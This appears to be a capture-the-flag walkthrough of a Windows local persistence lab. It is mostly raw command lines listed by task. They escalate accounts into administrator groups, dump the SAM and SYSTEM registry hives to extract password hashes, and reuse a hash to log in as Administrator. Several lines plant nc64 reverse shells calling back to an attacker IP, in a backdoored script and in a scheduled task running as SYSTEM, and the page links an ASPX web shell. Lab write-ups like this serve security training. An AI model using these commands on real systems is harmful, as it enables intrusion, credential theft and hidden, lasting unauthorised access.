Windows Local Persistence
March 16, 2024
Task 1: Introduction
Task 2: Tampering With Unprivileged Accounts
For the flag1
net localgroup administrators thmuser0 /add
net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321
whoami /groups
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
ls
python3 ~/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
ruby evil-winrm.rb -i 10.10.112.102 -u Administrator -H f3118544a831e728781d780cfdb9c1fa
For the flag 2
secedit /export /cfg config.inf
notepad config.inf
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
netuser thmuser2
ruby evil-winrm.rb -i 10.10.112.102 -u thmuser2 -p Password321
For the flag3
wmic useraccount get name,sid
cd /tools/pstools
dir
PsExec64.exe -i -s regedit
.\flag3.exe
whoami
Task 3: Backdooring Files
For the first flag on this task
cd /Windows/System32
notepad backdoor.ps1
```
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe 10.9.193.229 4445"
C:\Windows\System32\calc.exe
```
For the second flag of this task
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]
Task 4: Abusing Services
For the first flag for this task
For the second flag of this task
Task 5: Abusing Scheduled Tasks
schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.9.193.229 4449" /ru SYSTEM
schtasks /query /tn thm-taskbackdoor
cd /tools/pstools
./PsExec64.exe -s -i regedit
schtasks /query /tn thm-taskbackdoor
Task 6: Local Triggered Persistence
For the first flag of this task
For the second flag of this task
PS. Change the name from MyBackdooooooor to MyBackdoor since the task needs the name correctly
For the third flag of this task
For the fourth flag of this task
Task 7: Backdooring the Login Screen / RDP
For the second flag of this task
Just click the ease of access
Task 8: Persisting Through Existing Services
Download the rev shell here
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx
For the second flag of this task
Last updated